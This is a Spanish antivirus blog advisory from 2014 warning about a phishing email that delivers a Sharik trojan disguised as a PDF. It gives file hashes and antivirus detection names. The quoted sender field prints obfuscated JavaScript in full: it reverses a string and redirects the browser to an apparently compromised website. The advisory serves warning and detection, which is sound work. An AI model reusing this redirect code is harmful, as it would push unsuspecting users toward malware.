NUEVA VARIANTE DE TROJAN SHARIK QUE LLEGA ANEXADO A UN MAIL, CON ICONO DE PDF
Un nuevo mail malicioso se está recibiendo con estas características:
MAIL MALICIOSO:
_______________
Asunto: Review you order
De: “$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:support@salesforce.com”>support@salesforce.com>
Fecha: 18/02/2014 21:14
Para: <destinatario>
Please review you payment details.
Transaction id #136147eh147176
ANEXO: Transaction_20140219.rar
__________
FIN DEL MAIL MALICIOSO
El fichero .RAR que anexa dicho mail, contiene un fichero “payment.scr” con icono de PDF, para confundir al usuario y que lo ejecute pensando que se trata de un documento PDF de Adobe…
El preanalisis de virustotal ofrece este informe:
MD5 1d04ec629ec60707742f586e043bdcc1
SHA1 21b96d44c758cb337b427d8d28945ecc4c755de6
Tamaño del fichero 124.0 KB ( 126976 bytes )
SHA256: 2fd41799a3f4d536b4aebf6bd35f1e13db7f74327e0631347d3878658328e2ed
Nombre: payment.scr
Detecciones: 13 / 50
Fecha de análisis: 2014-02-19 09:24:26 UTC ( hace 0 minutos )
0 2
Antivirus Resultado Actualización
Commtouch W32/Trojan.JDCO-4815 20140219
ESET-NOD32 a variant of Win32/Kryptik.BVKG 20140219
F-Prot W32/Trojan3.HNB 20140219
Fortinet W32/Sharik.RQT!tr 20140219
Kaspersky Trojan.Win32.Sharik.rqt 20140219
Malwarebytes Trojan.FakeAMD 20140219
McAfee Artemis!1D04EC629EC6 20140219
McAfee-GW-Edition Artemis!1D04EC629EC6 20140219
Microsoft TrojanDownloader:Win32/Dofoil.W 20140219
Qihoo-360 HEUR/Malware.QVM09.Gen 20140219
Sophos Mal/Generic-S 20140219
Symantec Trojan.Smoaler 20140219
TrendMicro-HouseCall TROJ_GEN.F47V0219 20140219
Dicha version del ELISTARA 29.40 que lo detecta y elimina, estará disponible en nuestra web a partir de las 19 h CEST de hoy
saludos
ms, 19-2-2014
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Los comentarios están cerrados.